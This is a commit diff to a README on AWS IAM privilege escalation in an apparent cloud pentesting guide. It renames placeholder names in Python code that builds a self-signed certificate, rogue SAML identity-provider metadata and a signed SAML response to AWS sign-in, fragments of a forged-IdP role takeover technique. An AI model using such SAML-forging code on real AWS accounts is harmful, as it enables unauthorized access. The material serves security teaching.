
Commit 633b608

authored
Update README.md
1 parent 005ab23 commit 633b608

1 file changed

Lines changed: 6 additions & 6 deletions


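--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
@@ -384,7 +384,7 @@ def _openssl_make_key_and_cert(tmpdir: str) -> tuple[str, str]:
 "3650",
 "-nodes",
 "-subj",
-"/CN=iam-lab-7-attacker",
+"/CN=attacker-idp",
 ]
 )
 return key_path, cert_path
@@ -402,7 +402,7 @@ def _pem_cert_to_b64(cert_pem: str) -> str:
 
 def make_metadata_xml(cert_b64: str) -> str:
 return f"""<?xml version="1.0"?>
-<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://iam-lab-7.attacker.invalid/idp">
+<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://attacker-idp.invalid/idp">
 <IDPSSODescriptor protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
 <KeyDescriptor use="signing">
 <KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#">
@@ -411,7 +411,7 @@ def make_metadata_xml(cert_b64: str) -> str:
 </X509Data>
 </KeyInfo>
 </KeyDescriptor>
-<SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://iam-lab-7.attacker.invalid/sso"/>
+<SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://attacker-idp.invalid/sso"/>
 </IDPSSODescriptor>
 </EntityDescriptor>
 """
@@ -437,7 +437,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
 response.set("Destination", "https://signin.aws.amazon.com/saml")
 
 issuer = etree.SubElement(response, etree.QName(ns["saml2"], "Issuer"))
-issuer.text = "https://iam-lab-7.attacker.invalid/idp"
+issuer.text = "https://attacker-idp.attacker.invalid/idp"
 
 status = etree.SubElement(response, etree.QName(ns["saml2p"], "Status"))
 status_code = etree.SubElement(status, etree.QName(ns["saml2p"], "StatusCode"))
@@ -449,7 +449,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
 assertion.set("IssueInstant", issue_instant.isoformat())
 
 a_issuer = etree.SubElement(assertion, etree.QName(ns["saml2"], "Issuer"))
-a_issuer.text = "https://iam-lab-7.attacker.invalid/idp"
+a_issuer.text = "https://attacker-idp.attacker.invalid/idp"
 
 subject = etree.SubElement(assertion, etree.QName(ns["saml2"], "Subject"))
 name_id = etree.SubElement(subject, etree.QName(ns["saml2"], "NameID"))
@@ -488,7 +488,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
 attr_session = etree.SubElement(attribute_statement, etree.QName(ns["saml2"], "Attribute"))
 attr_session.set("Name", "https://aws.amazon.com/SAML/Attributes/RoleSessionName")
 attr_session_value = etree.SubElement(attr_session, etree.QName(ns["saml2"], "AttributeValue"))
-attr_session_value.text = "iam-lab-7-session"
+attr_session_value.text = "attacker-idp"
 
 with open(key_pem, "rb") as f:
 key_bytes = f.read()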
